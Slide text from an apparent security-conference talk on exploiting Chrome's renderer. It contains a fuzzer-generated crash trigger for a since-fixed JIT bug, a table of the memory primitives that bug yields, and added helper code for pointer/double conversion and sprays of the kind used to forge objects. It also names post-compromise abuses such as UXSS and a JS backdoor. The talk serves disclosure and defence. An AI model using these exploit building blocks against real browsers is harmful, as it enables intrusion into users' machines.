Browser Security Beyond Sandboxing - bluehatil.com Security Beyond Sandboxing.pdf · Servicing...
Browser Security Beyond Sandboxing
JORDAN RABET, MICROSOFT OSR
Who am I
Computer Science, Applied Math, AI, CV
Formerly
Presently
OSR: exploit things, mitigate things
@smealum
What I’m going to talk about
Browser Security Beyond Sandboxing…?
Live demo halfway through!
A difference in security strategy
- Justin Schuh, Chrome security lead
The result: a strong sandbox…
[Process diagram: Browser process; Renderer process #0, #1, #…; GPU process; PPAPI process]
The result: …and a soft RCE target
Finding a bug: fuzzing!
Ran a JavaScript fuzzer written by the Chakra team…
…using a fuzzing harness put together by the Security Assurance team…
…on Azure!
=> got an exploitable bug after less than a day of fuzzing
Figuring out the bug
var func0 = function(f)
{
var o =
{
a: {},
b:
{
ba: { baa: 1.2, bab: [] },
bb: {},
bc: { bca: { bcaa: 0, bcab: 0, bcac: this } },
}
};
o.b.bc.bca.bcab = 0;
o.b.bb.bba = Object.toString(o.b.ba.bab);
};
while(true) func0()
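The test case above is the kind of output a grammar-based JavaScript fuzzer produces: a function that builds a nested object literal with mixed property types, performs a few property stores, and is called in a hot loop so the JIT compiles it. The generator below is an added illustration of that approach, not the Chakra team's fuzzer: it emits cases of the same shape from a seed (the property names, leaf values and store forms are chosen here to mirror the case above; a bounded loop replaces `while(true)` so the output terminates).

```javascript
// Added example: a minimal seeded generator for fuzz cases shaped like the one
// above. This is illustrative code, not the fuzzer used in the talk.

// xorshift32 so that a given seed always yields the same test case.
function makeRng(seed) {
  let s = (seed >>> 0) || 1;
  return () => {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5;  s >>>= 0;
    return s / 0x100000000;   // [0, 1)
  };
}

// Leaf values of different types: a double, an empty array, an empty object,
// an integer, `this` and a string, so that loads see varying representations.
const LEAVES = ['1.2', '[]', '{}', '0', 'this', '"s"'];

// Build a nested object literal. `paths` collects dotted paths to every leaf
// (e.g. "o.b.a") so that stores can target real properties.
function genObject(rng, depth, prefix, paths) {
  const n = 1 + Math.floor(rng() * 3);          // 1..3 properties per object
  const props = [];
  for (let i = 0; i < n; i++) {
    const name = 'abc'[i];
    const path = `${prefix}.${name}`;
    let value;
    if (depth > 0 && rng() < 0.6) {
      value = genObject(rng, depth - 1, path, paths);
    } else {
      value = LEAVES[Math.floor(rng() * LEAVES.length)];
      paths.push(path);
    }
    props.push(`${name}: ${value}`);
  }
  return `{ ${props.join(', ')} }`;
}

// Emit one complete test case: the literal, 1..3 stores (a constant or the
// result of a call on another leaf, as in the case above) and a hot loop.
function genTestCase(seed) {
  const rng = makeRng(seed);
  const paths = [];
  const literal = genObject(rng, 3, 'o', paths);
  const stores = [];
  const nStores = 1 + Math.floor(rng() * 3);
  for (let i = 0; i < nStores; i++) {
    const dst = paths[Math.floor(rng() * paths.length)];
    const src = paths[Math.floor(rng() * paths.length)];
    stores.push(rng() < 0.5 ? `${dst} = 0;` : `${dst} = Object.toString(${src});`);
  }
  return [
    'var func0 = function(f) {',
    `  var o = ${literal};`,
    `  ${stores.join('\n  ')}`,
    '};',
    'for (var i = 0; i < 10000; i++) func0();',
  ].join('\n');
}

// Run a generated case in this engine; returns true if it executed without throwing.
function runTestCase(seed) {
  new Function(genTestCase(seed))();
  return true;
}

console.log(genTestCase(1));
runTestCase(1);
```

In a real campaign each generated case is fed to a fresh engine instance under a crash harness; here `runTestCase` only checks that the emitted source is valid and executes.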
Bug modifier #1: attribute type
Bug modifier #2: attribute offset
Bug modifier #3: local variable spray
Resulting bug capabilities

Type being sprayed   Type being loaded   Result
JavaScript object    Double value        Infoleak
Double value         Double value        Arbitrary read primitive
Double value         JavaScript object   Arbitrary JavaScript object manufacturing
Achieving code execution
We can manufacture arbitrary JavaScript objects
Create a fake ArrayBuffer object and use that to read/write arbitrary memory
Use the read/write primitive to locate and overwrite RWX code…
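The three rows of the capability table all come from the same mechanism: on a 64-bit engine an object slot holds a raw pointer and a double slot holds raw IEEE-754 bits, so a load that trusts the wrong type returns one as the other. The helpers below are an added example of the bit-level reinterpretation exploit code needs for that (not the speaker's exploit): `f2i` decodes a leaked double back into the pointer it really was (infoleak row), `i2f` encodes a chosen pointer as the double to spray (fake-object row), and the NaN check covers the one failure mode, since an engine may canonicalize NaN bit patterns when storing doubles. The addresses used are constructed for the demo.

```javascript
// Added example, not the speaker's exploit code. Float64Array and
// BigUint64Array share one buffer so the conversion is exact.
const f64 = new Float64Array(1);
const u64 = new BigUint64Array(f64.buffer);

// double -> 64-bit pattern: what a sprayed object pointer looks like when the
// confused load returns it as a double (the infoleak row).
function f2i(d) { f64[0] = d; return u64[0]; }

// 64-bit pattern -> double: the value to spray so that a confused load treats
// its bits as an object pointer (the fake-object row).
function i2f(bits) { u64[0] = BigInt.asUintN(64, bits); return f64[0]; }

function hex(bits) { return '0x' + bits.toString(16).padStart(16, '0'); }

// A pattern with exponent all ones and a non-zero mantissa is a NaN; some
// engines rewrite such doubles to a canonical NaN on store, which would
// silently corrupt the fake pointer. Infinity (zero mantissa) is left alone.
function isNaNPattern(bits) {
  const exp = (bits >> 52n) & 0x7ffn;
  return exp === 0x7ffn && (bits & 0xfffffffffffffn) !== 0n;
}

// Build the spray: `count` doubles whose bits are the chosen fake address.
function sprayFor(fakeAddr, count) {
  if (isNaNPattern(fakeAddr)) throw new Error('address encodes a NaN; pick another');
  return new Array(count).fill(i2f(fakeAddr));
}

// Decode a leaked double (an object pointer loaded as a double) to an address.
function leakToAddress(leaked) { return hex(f2i(leaked)); }

// Demo with constructed values: pretend the confused load returned `leaked`.
const leaked = i2f(0x00005555deadbee0n);
console.log('leaked object address:', leakToAddress(leaked));
console.log('1.2 as raw bits      :', hex(f2i(1.2)));   // the double used in the PoC
console.log('spray sample         :', sprayFor(0x4141414141414141n, 3));
```

Once a leaked address and a controllable double spray are in hand, the "fake ArrayBuffer" step above is a matter of laying out the bytes of an ArrayBuffer object in sprayed doubles (field layout is engine-version specific and not shown here) and pointing a manufactured object reference at them.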
Recap so far
[Process diagram: Browser process; Renderer process #0, #1, #…; GPU process; PPAPI process. WE ARE HERE: inside a renderer process]
DEMO TIME
Multiple origins in the same process
“Immortal” pop-unders
User interaction checks are renderer-side
window.onbeforeunload
JS backdoor for advanced shenanigans
UXSS
Aftermath
Bug was reported to Google
Bug was fixed by disabling old escape analysis implementation in just 4 days!
Fix made it to stable channel 3 days later
=> Impressive response time and agility from Google
Servicing procedure
Security bug fixes are published before they make it into official builds
Fixes often come with regression tests, giving a PoC
Lack of RCE mitigations makes many bugs easy to exploit
The fix didn’t ship to stable channel Chrome until 30 days later
=> Google regularly 0-days itself, which is not great
Site isolation
Conclusion
Browser RCE is still a serious threat
How bugs are serviced matters
Thank you for your time!
CONTACT: [email protected]
@smealum